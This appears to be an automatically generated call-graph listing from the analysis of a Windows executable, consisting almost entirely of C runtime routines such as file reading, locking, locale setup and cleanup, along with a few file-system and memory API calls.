19474->19475 19476 417240 __fread_nolock 25 API calls 19474->19476 19477 41b728 19476->19477 19477->19475 19478 417240 __fread_nolock 25 API calls 19477->19478 19479 41b738 19478->19479 19480 417240 __fread_nolock 25 API calls 19479->19480 19480->19475 19482 41b192 ___scrt_is_nonwritable_in_current_image 19481->19482 19483 41b1b2 19482->19483 19484 41b19a 19482->19484 19486 41b26f 19483->19486 19490 41b1e8 19483->19490 19485 413c44 __dosmaperr 14 API calls 19484->19485 19487 41b19f 19485->19487 19488 413c44 __dosmaperr 14 API calls 19486->19488 19489 413c57 _free 14 API calls 19487->19489 19491 41b274 19488->19491 19492 41b1a7 19489->19492 19493 41b1f1 19490->19493 19494 41b206 19490->19494 19495 413c57 _free 14 API calls 19491->19495 19492->19473 19492->19475 19496 413c44 __dosmaperr 14 API calls 19493->19496 19516 418732 EnterCriticalSection 19494->19516 19506 41b1fe 19495->19506 19499 41b1f6 19496->19499 19498 41b20c 19500 41b228 19498->19500 19501 41b23d 19498->19501 19503 413c57 _free 14 API calls 19499->19503 19504 413c57 _free 14 API calls 19500->19504 19505 41b29a __fread_nolock 37 API calls 19501->19505 19502 41569f __cftof 25 API calls 19502->19492 19503->19506 19507 41b22d 19504->19507 19508 41b238 19505->19508 19506->19502 19509 413c44 __dosmaperr 14 API calls 19507->19509 19517 41b267 19508->19517 19509->19508 19512 41753a __fread_nolock 15 API calls 19511->19512 19513 41fa4e 19512->19513 19514 417051 _free 14 API calls 19513->19514 19515 41fa58 19514->19515 19515->19467 19516->19498 19520 4187e7 LeaveCriticalSection 19517->19520 19519 41b26d 19519->19492 19520->19519 20867 417809 20868 417814 20867->20868 20869 417824 20867->20869 20873 41782a 20868->20873 20872 417051 _free 14 API calls 20872->20869 20874 417845 20873->20874 20875 41783f 20873->20875 20876 417051 _free 14 API calls 20874->20876 20877 417051 _free 14 API calls 20875->20877 20878 417851 20876->20878 20877->20874 20879 417051 _free 14 API calls 20878->20879 20880 41785c 20879->20880 20881 417051 _free 14 API calls 20880->20881 20882 417867 20881->20882 20883 417051 _free 14 API calls 20882->20883 20884 417872 20883->20884 20885 417051 _free 14 API calls 20884->20885 20886 41787d 20885->20886 20887 417051 _free 14 API calls 20886->20887 20888 417888 20887->20888 20889 417051 _free 14 API calls 20888->20889 20890 417893 20889->20890 20891 417051 _free 14 API calls 20890->20891 20892 41789e 20891->20892 20893 417051 _free 14 API calls 20892->20893 20894 4178ac 20893->20894 20899 417656 20894->20899 20900 417662 ___scrt_is_nonwritable_in_current_image 20899->20900 20915 416943 EnterCriticalSection 20900->20915 20902 41766c 20905 417051 _free 14 API calls 20902->20905 20906 417696 20902->20906 20905->20906 20916 4176b5 20906->20916 20907 4176c1 20908 4176cd ___scrt_is_nonwritable_in_current_image 20907->20908 20920 416943 EnterCriticalSection 20908->20920 20910 4176d7 20911 4178f7 _free 14 API calls 20910->20911 20912 4176ea 20911->20912 20921 41770a 20912->20921 20915->20902 20919 41698b LeaveCriticalSection 20916->20919 20918 4176a3 20918->20907 20919->20918 20920->20910 20924 41698b LeaveCriticalSection 20921->20924 20923 4176f8 20923->20872 20924->20923 23717 416619 23720 4165a0 23717->23720 23721 4165ac ___scrt_is_nonwritable_in_current_image 23720->23721 23728 416943 EnterCriticalSection 23721->23728 23723 4165e4 23729 416602 23723->23729 23724 4165b6 23724->23723 23726 41d848 __cftof 14 API calls 23724->23726 23726->23724 23728->23724 23732 41698b LeaveCriticalSection 23729->23732 23731 4165f0 23732->23731 19432 408224 19433 408231 19432->19433 19434 40f8f0 26 API calls 19433->19434 19435 408283 19434->19435 19436 403d90 26 API calls 19435->19436 19437 40828e 19436->19437 19438 40fda0 26 API calls 19437->19438 19439 40829a 19438->19439 19440 40f8f0 26 API calls 19439->19440 19441 408407 19440->19441 19442 403d90 26 API calls 19441->19442 19443 408412 19442->19443 19444 40fda0 26 API calls 19443->19444 19445 40842c 19444->19445 19446 412e34 28 API calls 19445->19446 19447 40854b 19446->19447 19448 412e34 28 API calls 19447->19448 19449 408585 GetFileAttributesA 19448->19449 19451 4085b7 CreateDirectoryA 19449->19451 19452 4085cb GetFileAttributesA 19451->19452 19454 4085e6 19452->19454 19453 408698 19454->19453 19455 4156af 25 API calls 19454->19455 19456 40872a 19455->19456 19521 410aca 19522 410ad6 ___scrt_is_nonwritable_in_current_image 19521->19522 19546 4107f0 19522->19546 19524 410add 19525 410c36 19524->19525 19535 410b07 ___scrt_is_nonwritable_in_current_image __cftof ___scrt_release_startup_lock 19524->19535 19586 410e53 IsProcessorFeaturePresent 19525->19586 19527 410c3d 19561 412d0f 19527->19561 19530 412cd3 __cftof 23 API calls 19531 410c4b 19530->19531 19532 410b26 19533 410ba7 19557 415e9e 19533->19557 19535->19532 19535->19533 19564 412ce9 19535->19564 19537 410bad 19538 410bc4 19537->19538 19575 410f75 GetModuleHandleW 19538->19575 19541 410bd2 19542 410bdb 19541->19542 19577 412cc4 19541->19577 19580 410961 19542->19580 19547 4107f9 19546->19547 19590 410c73 IsProcessorFeaturePresent 19547->19590 19551 41080a 19552 41080e 19551->19552 19600 41630a 19551->19600 19552->19524 19555 410825 19555->19524 19558 415eac 19557->19558 19559 415ea7 19557->19559 19558->19537 19721 415c02 19559->19721 19562 412bad __cftof 23 API calls 19561->19562 19563 410c43 19562->19563 19563->19530 19565 412cff _free 19564->19565 19566 4166de ___scrt_is_nonwritable_in_current_image 19564->19566 19565->19533 19567 417942 __cftof 37 API calls 19566->19567 19569 4166ef 19567->19569 19568 4167d3 __cftof 37 API calls 19571 416719 19568->19571 19569->19568 19570 416758 19570->19533 19571->19570 19572 413c57 _free 14 API calls 19571->19572 19573 41674e 19572->19573 19574 41569f __cftof 25 API calls 19573->19574 19574->19570 19576 410bce 19575->19576 19576->19527 19576->19541 19578 412bad __cftof 23 API calls 19577->19578 19579 412ccf 19578->19579 19579->19542 19581 41096d 19580->19581 19582 410983 19581->19582 19940 41631c 19581->19940 19582->19532 19584 41097b 19585 411431 ___scrt_uninitialize_crt 7 API calls 19584->19585 19585->19582 19587 410e68 ___scrt_fastfail 19586->19587 19588 410f13 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19587->19588 19589 410f5e ___scrt_fastfail 19588->19589 19589->19527 19591 410805 19590->19591 19592 411412 19591->19592 19609 411974 19592->19609 19595 41141b 19595->19551 19597 411423 19598 41142e 19597->19598 19623 4119b0 19597->19623 19598->19551 19664 41cd83 19600->19664 19603 411431 19604 411444 19603->19604 19605 41143a 19603->19605 19604->19552 19606 411959 ___vcrt_uninitialize_ptd 6 API calls 19605->19606 19607 41143f 19606->19607 19608 4119b0 ___vcrt_uninitialize_locks DeleteCriticalSection 19607->19608 19608->19604 19610 41197d 19609->19610 19612 4119a6 19610->19612 19613 411417 19610->19613 19627 411d88 19610->19627 19614 4119b0 ___vcrt_uninitialize_locks DeleteCriticalSection 19612->19614 19613->19595 19615 411926 19613->19615 19614->19613 19645 411c99 19615->19645 19620 411956 19620->19597 19622 41193b 19622->19597 19624 4119da 19623->19624 19625 4119bb 19623->19625 19624->19595 19626 4119c5 DeleteCriticalSection 19625->19626 19626->19624 19626->19626 19632 411c50 19627->19632 19630 411dc0 InitializeCriticalSectionAndSpinCount 19631 411dab 19630->19631 19631->19610 19633 411c8b 19632->19633 19634 411c68 19632->19634 19633->19630 19633->19631 19634->19633 19638 411ba4 19634->19638 19637 411c7d GetProcAddress 19637->19633 19643 411bb3 19638->19643 19639 411c45 19639->19633 19639->19637 19640 411bcc LoadLibraryExW 19641 411be7 GetLastError 19640->19641 19640->19643 19641->19643 19642 411c2e FreeLibrary 19642->19643 19643->19639 19643->19640 19643->19642 19644 411c06 LoadLibraryExW 19643->19644 19644->19643 19646 411c50 ___vcrt_FlsGetValue 5 API calls 19645->19646 19647 411cb3 19646->19647 19648 411ccc TlsAlloc 19647->19648 19649 411930 19647->19649 19649->19622 19650 411d4a 19649->19650 19651 411c50 ___vcrt_FlsGetValue 5 API calls 19650->19651 19652 411d64 19651->19652 19653 411d7f TlsSetValue 19652->19653 19654 411949 19652->19654 19653->19654 19654->19620 19655 411959 19654->19655 19656 411969 19655->19656 19657 411963 19655->19657 19656->19622 19659 411cd4 19657->19659 19660 411c50 ___vcrt_FlsGetValue 5 API calls 19659->19660 19661 411cee 19660->19661 19662 411d06 TlsFree 19661->19662 19663 411cfa 19661->19663 19662->19663 19663->19656 19665 41cd93 19664->19665 19666 410817 19664->19666 19665->19666 19668 418e1b 19665->19668 19666->19555 19666->19603 19669 418e27 ___scrt_is_nonwritable_in_current_image 19668->19669 19680 416943 EnterCriticalSection 19669->19680 19671 418e2e 19681 418694 19671->19681 19674 418e4c 19705 418e72 19674->19705 19680->19671 19682 4186a0 ___scrt_is_nonwritable_in_current_image 19681->19682 19683 4186a9 19682->19683 19684 4186ca 19682->19684 19685 413c57 _free 14 API calls 19683->19685 19708 416943 EnterCriticalSection 19684->19708 19687 4186ae 19685->19687 19688 41569f __cftof 25 API calls 19687->19688 19690 4186b8 19688->19690 19689 418702 19716 418729 19689->19716 19690->19674 19694 418cb1 GetStartupInfoW 19690->19694 19691 4186d6 19691->19689 19709 4185e4 19691->19709 19695 418d62 19694->19695 19696 418cce 19694->19696 19700 418d67 19695->19700 19696->19695 19697 418694 26 API calls 19696->19697 19698 418cf6 19697->19698 19698->19695 19699 418d26 GetFileType 19698->19699 19699->19698 19701 418d6e 19700->19701 19702 418db1 GetStdHandle 19701->19702 19703 418e17 19701->19703 19704 418dc4 GetFileType 19701->19704 19702->19701 19703->19674 19704->19701 19720 41698b LeaveCriticalSection 19705->19720 19707 418e5d 19707->19665 19708->19691 19710 41b7df _free 14 API calls 19709->19710 19712 4185f6 19710->19712 19711 418603 19713 417051 _free 14 API calls 19711->19713 19712->19711 19714 417f01 __wsopen_s 6 API calls 19712->19714 19715 418658 19713->19715 19714->19712 19715->19691 19719 41698b LeaveCriticalSection 19716->19719 19718 418730 19718->19690 19719->19718 19720->19707 19722 415c0b 19721->19722 19725 415c21 19721->19725 19722->19725 19727 415c2e 19722->19727 19724 415c18 19724->19725 19740 415d80 19724->19740 19725->19558 19728 415c37 19727->19728 19729 415c3a 19727->19729 19728->19724 19748 41c56e 19729->19748 19734 415c4c 19736 417051 _free 14 API calls 19734->19736 19738 415c7b 19736->19738 19738->19724 19739 417051 _free 14 API calls 19739->19734 19745 415df1 19740->19745 19746 415d8f 19740->19746 19741 41c82b WideCharToMultiByte __cftof 19741->19746 19742 41b7df _free 14 API calls 19742->19746 19743 415df5 19744 417051 _free 14 API calls 19743->19744 19744->19745 19745->19725 19746->19741 19746->19742 19746->19743 19746->19745 19747 417051 _free 14 API calls 19746->19747 19747->19746 19749 415c41 19748->19749 19750 41c577 19748->19750 19754 41c90f GetEnvironmentStringsW 19749->19754 19783 4179ff 19750->19783 19755 41c926 19754->19755 19756 41c97c 19754->19756 19759 41c82b __cftof WideCharToMultiByte 19755->19759 19757 41c985 FreeEnvironmentStringsW 19756->19757 19758 415c46 19756->19758 19757->19758 19758->19734 19766 415c81 19758->19766 19760 41c93f 19759->19760 19760->19756 19761 41753a __fread_nolock 15 API calls 19760->19761 19762 41c94f 19761->19762 19763 41c967 19762->19763 19764 41c82b __cftof WideCharToMultiByte 19762->19764 19765 417051 _free 14 API calls 19763->19765 19764->19763 19765->19756 19767 415c96 19766->19767 19768 41b7df _free 14 API calls 19767->19768 19771 415cbd 19768->19771 19769 417051 _free 14 API calls 19772 415c57 19769->19772 19770 415d22 19770->19769 19771->19770 19773 41b7df _free 14 API calls 19771->19773 19774 415d24 19771->19774 19775 416779 ___std_exception_copy 25 API calls 19771->19775 19778 415d44 19771->19778 19781 417051 _free 14 API calls 19771->19781 19772->19739 19773->19771 19934 415d51 19774->19934 19775->19771 19780 4156cc __cftof 11 API calls 19778->19780 19779 417051 _free 14 API calls 19779->19770 19782 415d50 19780->19782 19781->19771 19784 417a10 19783->19784 19785 417a0a 19783->19785 19787 417ebf _free 6 API calls 19784->19787 19805 417a16 19784->19805 19786 417e80 _free 6 API calls 19785->19786 19786->19784 19788 417a2a 19787->19788 19790 41b7df _free 14 API calls 19788->19790 19788->19805 19789 4167d3 __cftof 37 API calls 19791 417a98 19789->19791 19792 417a3a 19790->19792 19793 417a42 19792->19793 19794 417a57 19792->19794 19797 417ebf _free 6 API calls 19793->19797 19796 417ebf _free 6 API calls 19794->19796 19795 417a8f 19808 41c3b5 19795->19808 19798 417a63 19796->19798 19799 417a4e 19797->19799 19800 417a67 19798->19800 19801 417a76 19798->19801 19802 417051 _free 14 API calls 19799->19802 19803 417ebf _free 6 API calls 19800->19803 19804 417770 _free 14 API calls 19801->19804 19802->19805 19803->19799 19806 417a81 19804->19806 19805->19789 19805->19795 19807 417051 _free 14 API calls 19806->19807 19807->19805 19809 41c4ce __cftof 37 API calls 19808->19809 19810 41c3c8 19809->19810 19827 41c15e 19810->19827 19813 41c3e1 19813->19749 19814 41753a __fread_nolock 15 API calls 19815 41c3f2 19814->19815 19822 41c424 19815->19822 19834 41c5c9 19815->19834 19817 417051 _free 14 API calls 19820 41c432 19817->19820 19819 41c41f 19821 413c57 _free 14 API calls 19819->19821 19820->19749 19821->19822 19822->19817 19823 41c466 19823->19822 19845 41c050 19823->19845 19824 41c43a 19824->19823 19825 417051 _free 14 API calls 19824->19825 19825->19823 19828 413015 __cftof 37 API calls 19827->19828 19829 41c170 19828->19829 19830 41c191 19829->19830 19831 41c17f GetOEMCP 19829->19831 19832 41c1a8 19830->19832 19833 41c196 GetACP 19830->19833 19831->19832 19832->19813 19832->19814 19833->19832 19835 41c15e 39 API calls 19834->19835 19836 41c5e9 19835->19836 19838 41c623 IsValidCodePage 19836->19838 19843 41c65f ___scrt_fastfail 19836->19843 19837 4111f2 _ValidateLocalCookies 5 API calls 19839 41c417 19837->19839 19840 41c635 19838->19840 19838->19843 19839->19819 19839->19824 19841 41c664 GetCPInfo 19840->19841 19844 41c63e ___scrt_fastfail 19840->19844 19841->19843 19841->19844 19843->19837 19853 41c234 19844->19853 19846 41c05c ___scrt_is_nonwritable_in_current_image 19845->19846 19922 416943 EnterCriticalSection 19846->19922 19848 41c066 19923 41c09d 19848->19923 19854 41c25c GetCPInfo 19853->19854 19855 41c325 19853->19855 19854->19855 19860 41c274 19854->19860 19856 4111f2 _ValidateLocalCookies 5 API calls 19855->19856 19858 41c3b3 19856->19858 19858->19843 19864 41d3db 19860->19864 19863 421c5e 41 API calls 19863->19855 19865 413015 __cftof 37 API calls 19864->19865 19866 41d3fb 19865->19866 19867 417588 __fassign MultiByteToWideChar 19866->19867 19868 41d428 19867->19868 19869 41d4b9 19868->19869 19871 41753a __fread_nolock 15 API calls 19868->19871 19875 41d44e ___scrt_fastfail 19868->19875 19870 4111f2 _ValidateLocalCookies 5 API calls 19869->19870 19872 41c2dc 19870->19872 19871->19875 19879 421c5e 19872->19879 19873 41d4b3 19884 41d4de 19873->19884 19875->19873 19876 417588 __fassign MultiByteToWideChar 19875->19876 19877 41d49c 19876->19877 19877->19873 19878 41d4a3 GetStringTypeW 19877->19878 19878->19873 19880 413015 __cftof 37 API calls 19879->19880 19881 421c71 19880->19881 19888 421a74 19881->19888 19885 41d4ea 19884->19885 19886 41d4fb 19884->19886 19885->19886 19887 417051 _free 14 API calls 19885->19887 19886->19869 19887->19886 19889 421a8f 19888->19889 19890 417588 __fassign MultiByteToWideChar 19889->19890 19892 421ad3 19890->19892 19891 421c38 19893 4111f2 _ValidateLocalCookies 5 API calls 19891->19893 19892->19891 19895 41753a __fread_nolock 15 API calls 19892->19895 19900 421af8 19892->19900 19894 41c2fd 19893->19894 19894->19863 19895->19900 19896 421b9d 19899 41d4de __freea 14 API calls 19896->19899 19897 417588 __fassign MultiByteToWideChar 19898 421b3e 19897->19898 19898->19896 19916 417f4c 19898->19916 19899->19891 19900->19896 19900->19897 19903 421b74 19903->19896 19906 417f4c 6 API calls 19903->19906 19904 421bac 19905 41753a __fread_nolock 15 API calls 19904->19905 19909 421bbe 19904->19909 19905->19909 19906->19896 19907 421c29 19908 41d4de __freea 14 API calls 19907->19908 19908->19896 19909->19907 19910 417f4c 6 API calls 19909->19910 19911 421c06 19910->19911 19911->19907 19912 41c82b __cftof WideCharToMultiByte 19911->19912 19913 421c20 19912->19913 19913->19907 19914 421c55 19913->19914 19915 41d4de __freea 14 API calls 19914->19915 19915->19896 19917 417bc8 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 19916->19917 19918 417f57 19917->19918 19919 417fa9 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 19918->19919 19921 417f5d 19918->19921 19920 417f9d LCMapStringW 19919->19920 19920->19921 19921->19896 19921->19903 19921->19904 19922->19848 19924 415472 __fread_nolock 25 API calls 19923->19924 19925 41c0bf 19924->19925 19926 415472 __fread_nolock 25 API calls 19925->19926 19927 41c0de 19926->19927 19928 417051 _free 14 API calls 19927->19928 19929 41c073 19927->19929 19928->19929 19930 41c091 19929->19930 19933 41698b LeaveCriticalSection 19930->19933 19932 41c07f 19932->19822 19933->19932 19935 415d2a 19934->19935 19939 415d5e 19934->19939 19935->19779 19936 415d75 19937 417051 _free 14 API calls 19936->19937 19937->19935 19938 417051 _free 14 API calls 19938->19939 19939->19936 19939->19938 19941 416327 19940->19941 19942 416339 ___scrt_uninitialize_crt 19940->19942 19943 416335 19941->19943 19945 417531 19941->19945 19942->19584 19943->19584 19948 4173df 19945->19948 19951 417333 19948->19951 19952 41733f ___scrt_is_nonwritable_in_current_image 19951->19952 19959 416943 EnterCriticalSection 19952->19959 19954 4173b5 19968 4173d3 19954->19968 19957 417349 ___scrt_uninitialize_crt 19957->19954 19960 4172a7 19957->19960 19959->19957 19961 4172b3 ___scrt_is_nonwritable_in_current_image 19960->19961 19971 416af7 EnterCriticalSection 19961->19971 19963 4172bd ___scrt_uninitialize_crt 19967 4172f6 19963->19967 19972 4174e9 19963->19972 19982 417327 19967->19982 20015 41698b LeaveCriticalSection 19968->20015 19970 4173c1 19970->19943 19971->19963 19973 4174f6 19972->19973 19974 4174ff 19972->19974 19975 4173df ___scrt_uninitialize_crt 66 API calls 19973->19975 19976 417484 ___scrt_uninitialize_crt 62 API calls 19974->19976 19981 4174fc 19975->19981 19977 417505 19976->19977 19978 417240 __fread_nolock 25 API calls 19977->19978 19977->19981 19979 41751b 19978->19979 19985 41ea13 19979->19985 19981->19967 20014 416b0b LeaveCriticalSection 19982->20014 19984 417315 19984->19957 19986 41ea31 19985->19986 19987 41ea24 19985->19987 19989 41ea7a 19986->19989 19991 41ea58 19986->19991 19988 413c57 _free 14 API calls 19987->19988 19993 41ea29 19988->19993 19990 413c57 _free 14 API calls 19989->19990 19992 41ea7f 19990->19992 19996 41e971 19991->19996 19995 41569f __cftof 25 API calls 19992->19995 19993->19981 19995->19993 19997 41e97d ___scrt_is_nonwritable_in_current_image 19996->19997 20010 418732 EnterCriticalSection 19997->20010 19999 41e98c 20000 41e9d3 19999->20000 20002 4189ae __wsopen_s 25 API calls 19999->20002 20001 413c57 _free 14 API calls 20000->20001 20004 41e9d8 20001->20004 20003 41e9b8 FlushFileBuffers 20002->20003 20003->20004 20005 41e9c4 20003->20005 20011 41ea07 20004->20011 20006 413c44 __dosmaperr 14 API calls 20005->20006 20008 41e9c9 GetLastError 20006->20008 20008->20000 20010->19999 20012 4187e7 __wsopen_s LeaveCriticalSection 20011->20012 20013 41e9f0 20012->20013 20013->19993 20014->19984 20015->19970 23770 4222c9 23771 4222d5 ___scrt_is_nonwritable_in_current_image 23770->23771 23778 416943 EnterCriticalSection 23771->23778 23773 4222e0 23779 422328 23773->23779 23778->23773 23780 422337 23779->23780 23781 42234a 23779->23781 23782 413c57 _free 14 API calls 23780->23782 23784 422398 23781->23784 23790 42235c 23781->23790 23783 42233c 23782->23783 23785 41569f __cftof 25 API calls 23783->23785 23786 413c57 _free 14 API calls 23784->23786 23789 4222f6 23785->23789 23787 42239d 23786->23787 23788 41569f __cftof 25 API calls 23787->23788 23788->23789 23795 42231f 23789->23795 23790->23789 23791 416779 ___std_exception_copy 25 API calls 23790->23791 23792 4223b3 23791->23792 23792->23789 23793 4156cc __cftof 11 API calls 23792->23793 23794 4223cd 23793->23794 23798 41698b LeaveCriticalSection 23795->23798 23797 42230a 23798->23797 20283 910000 20286 910009 20283->20286 20288 910011 20286->20288 20289 910020 20288->20289 20290 910041 20289->20290 20291 910036 VirtualFree 20289->20291 20291->20290 20292 4198f4 20293 417240 __fread_nolock 25 API calls 20292->20293 20294 419902 20293->20294 20295 419911 20294->20295 20296 419930 20294->20296 20297 413c57 _free 14 API calls 20295->20297 20298 41993e 20296->20298 20299 41994b 20296->20299 20305 419916 20297->20305 20300 413c57 _free 14 API calls 20298->20300 20304 41995e 20299->20304 20320 419ad5 20299->20320 20300->20305 20302 4199dd 20309 419a09 20302->20309 20304->20302 20304->20305 20306 41f686 __fread_nolock 25 API calls 20304->20306 20307 4199d0 20304->20307 20306->20307 20307->20302 20308 41fa33 15 API calls 20307->20308 20308->20302 20310 417240 __fread_nolock 25 API calls 20309->20310 20311 419a18 20310->20311 20312 419abb 20311->20312 20313 419a2b 20311->20313 20314 419620 __wsopen_s 62 API calls 20312->20314 20315 419a48 20313->20315 20318 419a6c 20313->20318 20317 419a55 20314->20317 20316 419620 __wsopen_s 62 API calls 20315->20316 20316->20317 20317->20305 20318->20317 20328 41f864 20318->20328 20321 419aeb 20320->20321 20322 419aef 20320->20322 20321->20304 20323 4189ae __wsopen_s 25 API calls 20322->20323 20325 419b3e 20322->20325 20324 419b10 20323->20324 20324->20325 20326 419b18 SetFilePointerEx 20324->20326 20325->20304 20326->20325 20327 419b2f GetFileSizeEx 20326->20327 20327->20325 20331 41f6dc 20328->20331 20332 41f6e8 ___scrt_is_nonwritable_in_current_image 20331->20332 20333 41f6f0 20332->20333 20334 41f708 20332->20334 20335 413c44 __dosmaperr 14 API calls 20333->20335 20336 41f7b9 20334->20336 20339 41f73d 20334->20339 20337 41f6f5 20335->20337 20338 413c44 __dosmaperr 14 API calls 20336->20338 20341 413c57 _free 14 API calls 20337->20341 20340 41f7be 20338->20340 20356 418732 EnterCriticalSection 20339->20356 20343 413c57 _free 14 API calls 20340->20343 20349 41f6fd 20341->20349 20345 41f7c6 20343->20345 20344 41f743 20346 41f767 20344->20346 20347 41f77c 20344->20347 20348 41569f __cftof 25 API calls 20345->20348 20350 413c57 _free 14 API calls 20346->20350 20351 41f7e8 __fread_nolock 27 API calls 20347->20351 20348->20349 20349->20317 20352 41f76c 20350->20352 20353 41f777 20351->20353 20354 413c44 __dosmaperr 14 API calls 20352->20354 20357 41f7b1 20353->20357 20354->20353 20356->20344 20360 4187e7 LeaveCriticalSection 20357->20360 20359 41f7b7 20359->20349 20360->20359 24072 418a94 24073 418c37 24072->24073 24075 418abe 24072->24075 24074 413c57 _free 14 API calls 24073->24074 24092 418c22 24074->24092 24075->24073 24078 418b09 24075->24078 24076 4111f2 _ValidateLocalCookies 5 API calls 24077 418c54 24076->24077 24093 41f5d5 24078->24093 24082 418b3d 24083 418c56 24082->24083 24106 41ee0f 24082->24106 24085 4156cc __cftof 11 API calls 24083->24085 24087 418c62 24085->24087 24086 418b4f 24086->24083 24113 41ee3b 24086->24113 24089 418b61 24089->24083 24090 418b6a 24089->24090 24090->24092 24120 41f632 24090->24120 24092->24076 24094 41f5e1 ___scrt_is_nonwritable_in_current_image 24093->24094 24095 418b29 24094->24095 24126 416943 EnterCriticalSection 24094->24126 24099 41ede3 24095->24099 24097 41f5f2 24127 41f629 24097->24127 24100 41ee04 24099->24100 24101 41edef 24099->24101 24100->24082 24102 413c57 _free 14 API calls 24101->24102 24103 41edf4 24102->24103 24104 41569f __cftof 25 API calls 24103->24104 24105 41edff 24104->24105 24105->24082 24107 41ee30 24106->24107 24108 41ee1b 24106->24108 24107->24086 24109 413c57 _free 14 API calls 24108->24109 24110 41ee20 24109->24110 24111 41569f __cftof 25 API calls 24110->24111 24112 41ee2b 24111->24112 24112->24086 24114 41ee47 24113->24114 24115 41ee5c 24113->24115 24116 413c57 _free 14 API calls 24114->24116 24115->24089 24117 41ee4c 24116->24117 24118 41569f __cftof 25 API calls 24117->24118 24119 41ee57 24118->24119 24119->24089 24121 41f63e ___scrt_is_nonwritable_in_current_image 24120->24121 24131 416943 EnterCriticalSection 24121->24131 24123 41f649 24132 41f67d 24123->24132 24126->24097 24130 41698b LeaveCriticalSection 24127->24130 24129 41f630 24129->24095 24130->24129 24131->24123 24135 41698b LeaveCriticalSection 24132->24135 24134 41f668 24134->24092 24135->24134 24176 416aab 24177 417531 ___scrt_uninitialize_crt 66 API calls 24176->24177 24178 416ab3 24177->24178 24186 41ddbc 24178->24186 24180 416ab8 24181 417267 14 API calls 24180->24181 24182 416ac7 DeleteCriticalSection 24181->24182 24182->24180 24183 416ae2 24182->24183 24184 417051 _free 14 API calls 24183->24184 24185 416aed 24184->24185 24187 41ddc8 ___scrt_is_nonwritable_in_current_image 24186->24187 24196 416943 EnterCriticalSection 24187->24196 24189 41de3f 24197 41de5e 24189->24197 24191 41de13 DeleteCriticalSection 24194 417051 _free 14 API calls 24191->24194 24193 412ec2 67 API calls 24195 41ddd3 24193->24195 24194->24195 24195->24189 24195->24191 24195->24193 24196->24195 24200 41698b LeaveCriticalSection 24197->24200 24199 41de4b 24199->24180 24200->24199 20016 416eaf 20021 416c85 20016->20021 20019 416eee 20023 416ca4 20021->20023 20022 416ccc 20036 416dec 20022->20036 20041 41deb6 20022->20041 20023->20022 20024 416cb7 20023->20024 20025 413c57 _free 14 API calls 20024->20025 20026 416cbc 20025->20026 20027 41569f __cftof 25 API calls 20026->20027 20028 416cc7 20027->20028 20028->20019 20038 41e627 20028->20038 20029 413c57 _free 14 API calls 20030 416e9d 20029->20030 20031 41569f __cftof 25 API calls 20030->20031 20031->20028 20033 416e3c 20034 41deb6 37 API calls 20033->20034 20033->20036 20035 416e5a 20034->20035 20035->20036 20037 41deb6 37 API calls 20035->20037 20036->20028 20036->20029 20037->20036 20073 41dfec 20038->20073 20042 41dec5 20041->20042 20043 41df0d 20041->20043 20045 41decb 20042->20045 20049 41dee8 20042->20049 20055 41df23 20043->20055 20046 413c57 _free 14 API calls 20045->20046 20048 41ded0 20046->20048 20047 41dedb 20047->20033 20050 41569f __cftof 25 API calls 20048->20050 20051 413c57 _free 14 API calls 20049->20051 20054 41df06 20049->20054 20050->20047 20052 41def7 20051->20052 20053 41569f __cftof 25 API calls 20052->20053 20053->20047 20054->20033 20056 41df33 20055->20056 20057 41df4d 20055->20057 20058 413c57 _free 14 API calls 20056->20058 20059 41df55 20057->20059 20060 41df6c 20057->20060 20061 41df38 20058->20061 20062 413c57 _free 14 API calls 20059->20062 20063 41df78 20060->20063 20064 41df8f 20060->20064 20065 41569f __cftof 25 API calls 20061->20065 20066 41df5a 20062->20066 20067 413c57 _free 14 API calls 20063->20067 20068 413015 __cftof 37 API calls 20064->20068 20072 41df43 20064->20072 20065->20072 20069 41569f __cftof 25 API calls 20066->20069 20070 41df7d 20067->20070 20068->20072 20069->20072 20071 41569f __cftof 25 API calls 20070->20071 20071->20072 20072->20047 20074 41dff8 ___scrt_is_nonwritable_in_current_image 20073->20074 20075 41dfff 20074->20075 20078 41e02a 20074->20078 20076 413c57 _free 14 API calls 20075->20076 20077 41e004 20076->20077 20079 41569f __cftof 25 API calls 20077->20079 20084 41e5b9 20078->20084 20083 41e00e 20079->20083 20083->20019 20095 413098 20084->20095 20086 41e5db __wsopen_s 20087 41e5ef 20086->20087 20100 41e647 20086->20100 20089 41e04e 20087->20089 20090 417051 _free 14 API calls 20087->20090 20091 41e081 20089->20091 20090->20089 20092 41e087 20091->20092 20094 41e0ab 20091->20094 20271 4187e7 LeaveCriticalSection 20092->20271 20094->20083 20096 413015 __cftof 37 API calls 20095->20096 20097 4130aa 20096->20097 20098 4130bc 20097->20098 20146 417d86 20097->20146 20098->20086 20101 41e664 20100->20101 20102 41e692 20101->20102 20103 41e679 20101->20103 20152 41880a 20102->20152 20104 413c44 __dosmaperr 14 API calls 20103->20104 20106 41e67e 20104->20106 20110 413c57 _free 14 API calls 20106->20110 20108 41e6a0 20111 413c44 __dosmaperr 14 API calls 20108->20111 20109 41e6b7 20165 41e300 CreateFileW 20109->20165 20136 41e68b 20110->20136 20113 41e6a5 20111->20113 20115 413c57 _free 14 API calls 20113->20115 20114 41e76d GetFileType 20117 41e778 GetLastError 20114->20117 20118 41e7bf 20114->20118 20115->20106 20116 41e742 GetLastError 20120 413c21 __dosmaperr 14 API calls 20116->20120 20121 413c21 __dosmaperr 14 API calls 20117->20121 20167 418755 20118->20167 20119 41e6f0 20119->20114 20119->20116 20166 41e300 CreateFileW 20119->20166 20120->20106 20123 41e786 CloseHandle 20121->20123 20123->20106 20126 41e7af 20123->20126 20125 41e735 20125->20114 20125->20116 20128 413c57 _free 14 API calls 20126->20128 20130 41e7b4 20128->20130 20129 41e82c 20134 41e833 20129->20134 20191 41e0ad 20129->20191 20130->20106 20137 4171a4 __wsopen_s 28 API calls 20134->20137 20135 41e86f 20135->20136 20138 41e8eb CloseHandle 20135->20138 20136->20087 20137->20136 20217 41e300 CreateFileW 20138->20217 20140 41e916 20141 41e920 GetLastError 20140->20141 20142 41e94c 20140->20142 20143 413c21 __dosmaperr 14 API calls 20141->20143 20142->20136 20144 41e92c 20143->20144 20145 41891d __wsopen_s 15 API calls 20144->20145 20145->20142 20149 417b94 20146->20149 20150 417cc3 _free 5 API calls 20149->20150 20151 417baa 20150->20151 20151->20098 20153 418816 ___scrt_is_nonwritable_in_current_image 20152->20153 20218 416943 EnterCriticalSection 20153->20218 